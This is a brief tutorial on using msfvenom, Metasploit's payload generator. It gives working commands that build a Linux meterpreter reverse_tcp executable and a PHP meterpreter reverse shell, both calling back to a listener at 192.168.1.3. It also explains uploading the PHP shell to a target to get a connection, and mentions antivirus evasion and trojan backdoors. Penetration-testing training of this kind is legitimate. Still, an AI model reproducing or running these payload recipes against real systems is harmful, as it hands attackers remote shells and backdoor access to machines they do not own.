Msfvenom is an utility software which comes with metasploit and it can be used as a payload generator to be used for the following purposes:
- Payload Encoder
- Assistant in Exploit Generation
- Trojan Backdoors
- Generation of web shells
It also has an option to help with antivirus evasion (although quite limited).
Let's see how to use it, we can basically use the --list option to show the available options for the following elements: * payloads * formats * encoders * archs (architectures) * platforms
msfvenom --list payloads | grep meterpreter # shows all the meterpreter payloads
Once we select a payload, we can check what options are available for that payload with:
msfvenom --payload linux/x64/meterpreter/reverse_tcp --list-options
Notice that in older versions of metasploit instead of
--list-options we had
We can check what format we have available to generate our payload:
msfvenom --list formats msfvenom --list platforms
Once we see a format and platform that we need/like we can do:
msfvenom --payload linux/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=4444 --format elf -o out_filename
Let's see now how to generate a php reverse shell:
msfvenom --list payloads | grep php msfvenom --payload php/meterpreter/reverse_tcp lhost=192.168.1.3 lport=5555 -o php_rev_shell
In order to execute this script we should find a way to upload it and get back a connection which can be handled by our multi-handler.
Notice that with msfvenom it may be useful to use sometimes --smallest to generate a very small payload.